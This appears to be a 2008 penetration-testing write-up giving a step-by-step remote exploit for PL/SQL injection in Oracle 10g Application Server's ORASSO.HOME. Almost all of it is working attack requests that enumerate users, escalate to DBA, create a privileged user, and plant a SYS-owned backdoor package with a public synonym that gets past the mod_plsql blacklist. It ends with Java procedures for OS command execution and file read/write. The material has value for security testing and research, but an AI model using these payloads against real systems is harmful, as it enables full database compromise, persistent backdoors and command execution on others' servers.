Oracle Portal for Friends

back

Last update data: 22 Jan 2008
First public release: 22 Jan 2008
Author: Ivan Verri aka raist (raist at mediaservice dot net)

Oracle 10g Application Server till 10.1.2 .1.0 remote exploiting of what described in:

• Testing_for_Oracle
• Bugtraq ID 16384

This example makes use of injection in ORASSO.HOME but these path also work:

• JAVA_AUTONOMOUS_TRANSACTION.PUSH
• XMLGEN.USELOWERCASETAGNAMES
• PORTAL.WWV_HTP.CENTERCLOSE
• ORASSO.HOME
• WWC_VERSION.GET_HTTP_DATABASE_INFO

---

Information gathering

View current user (should be ORASSO_PUBLIC)

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+USER_USERS"

View roles of current user

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+*+FROM+USER_ROLE_PRIVS"

View full users list

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+username+from+all_users"

View the IP address of the database server

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT(´USERENV´,+´IP_ADDRESS´,+15)+ipaddr+from+dual"

View the hostname of the database server

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT(´USERENV´,+´HOST´,+15)+ipaddr+from+dual"

Exploiting

The user ORASSO_PUBLIC has really not much privileges and cannot create procedures, functions or packages so you can use only few exploits to elevate his privileges.
Another way is to use cursors to exploit common vulnerabilities without creating packages or functions.

Exploit #1 to grant DBA to current user (Oracle10g R1 and R2 prior to CPU Oct 2006) (an error is returned, but it works anyway!). It does not need to create packages.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+SEQUENCE_OWNER+VARCHAR2(200);+SEQUENCE_NAME+VARCHAR2(200);+v_user_id+number;+v_commands+VARCHAR2(32767);+NEW_VALUE+NUMBER;+BEGIN+SELECT+user_id+INTO+v_user_id+FROM+user_users;+v_commands+:=+´insert+into+sys.sysauth$+´+||+´+values´+||+´(´+||+v_user_id+||+´,4,´+||+´999,null)´;+SEQUENCE_OWNER+:=+´TEST´;+SEQUENCE_NAME+:=+´´´,lockhandle=>:1);´+||+v_commands+||+´;commit;+end;--´;+NEW_VALUE+:=+1;+SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(SEQUENCE_OWNER+=>+SEQUENCE_OWNER,+SEQUENCE_NAME+=>+SEQUENCE_NAME,+NEW_VALUE+=>+NEW_VALUE);+END;"

Exploit #2 (ab)using SYS.KUPW$WORKER.MAIN to execute commands as DBA
http://www.milw0rm.com/exploits/3584

http://192.168.41.5:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+MYC NUMBER;+BEGIN+MYC+:=+DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(MYC,´declare+pragma+autonomous_transaction;begin+execute+immediate+´´create+user+pippo+identified+by+pippo123´´;commit;end;´,0);SYS.KUPW\$WORKER.MAIN(´´´+AND+0=dbms_sql.execute(´||myc||´)--´,´.´);end;

Create user PENTEST identified by PEN123TEST.
Obviously this works only if you granted dba to orasso_public.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+USER+PENTEST+IDENTIFIED+BY+PEN123TEST"

Give some specific, java related, grants to user PENTEST.
These privileges are needed if you do not wont to use java to execute O.S. commands and read/write the underlying file system using raptor_oraexec.sql
http://0xdeadbeef.info/exploits/raptor_oraexec.sql

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+DBA+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVADEBUGPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAIDPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVASYSPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAUSERPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVA_ADMIN+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SYSTEM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SESSION+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+USER+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+JOB+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+USER+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+SYNONYM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+ROLE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+TABLE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+MANAGE+SCHEDULER+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+SELECT+ANY+TABLE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+CLASS+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+LIBRARY+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+SYNONYM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+PROCEDURE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+LIBRARY+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROGRAM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+PRIVILEGE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+PUBLIC+SYNONYM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROCEDURE+TO+PENTEST"

Create a backdoor package that can works also if the vulnerability is patched.
The package is owned by SYS so each issued command is executed like SYSDBA.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2);END+BACK_PKG;"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+BODY+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2)+IS+BEGIN+EXECUTE+IMMEDIATE+commandline;+END;+END+BACK_PKG;"

Grant public execute to the backdoor package.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ON+PENTEST.BACK_PKG+TO+PUBLIC"

Creating a public synonym can be useful to run the backdoor bypassing mod_pl/sql blacklist.(be sure to not use a forbidden word to name the synonym, like sys,owa,system,etc...).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE%20OR%20REPLACE%20PUBLIC%20SYNONYM%20BACKDOOR%20FOR%20PENTEST.BACK_PKG"

Use this syntax to execute commands as SYSDBA through the backdoor (yes, it works via http too :) .

wget -q -O /dev/null  http://192.168.100.195:7777/pls/orasso/BACKDOOR.exec_this_code?COMMANDLINE=create%20user%20pippo%20identified%20by%20pippo123

This is a java procedure to access the file system and execute os commands (raptor_oraexec.sql). You can run it on a single command line or just cut & paste as it is.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace and resolve java source named PENTEST.oraexec as

import java.lang.*;

import java.io.*;

public class oraexec

{

    /*

    * Command execution module

    */

    public static void execCommand (String command) throws IOException

    {

    Runtime.getRuntime().exec(command);

    }

    /*

    * File reading module

    */

    public static void readFile(String filename) throws IOException

    {

        FileReader f = new FileReader(filename);

        BufferedReader fr = new BufferedReader(f);

        String text = fr.readLine();

        while (text != null) {

            System.out.println(text);

            text = fr.readLine();

        }

        fr.close();

    }

    /*

    * File writing module

    */

    public static void writeFile(String filename, String line) throws IOException

    {

        FileWriter f = new FileWriter(filename, true); /* append */

        BufferedWriter fw = new BufferedWriter(f);

        fw.write(line);

        fw.write(\"\n\");

        fw.close();

    }

}"

Let´s create 3 different procedures to use the prior java source and execute command, read files, write files.

Execute commands

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javacmd(p_command varchar2) as

language java

name ´oraexec.execCommand(java.lang.String)´;"

Read files

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javareadfile(p_filename in varchar2) as

language java

name ´oraexec.readFile(java.lang.String)´;"

Write (append) a files

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javawritefile(p_filename in varchar2, p_line in varchar2) as

language java

name ´oraexec.writeFile(java.lang.String, java.lang.String)´;"

Use the dbms_java.grant_permission stored procedure to give read,write,execute on file system (/) to the user PENTEST

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission(´PENTEST´,´SYS:java.io.FilePermission´,´/´,´read´ )"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission(´PENTEST´,´SYS:java.io.FilePermission´,´/´,´write´ )"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=exec dbms_java.grant_permission(´PENTEST´,´SYS:java.io.FilePermission´,´/´,´execute´ )"

Give public execute grant to the new stored procedures oraexec.*

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javacmd to public"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javareadfile to public"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javawritefile to public"

Here we go, let´s run some os command (remember to use full paths).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);pentest.javacmd(:1);--=/usr/sbin/ping 192.168.100.1"

---

back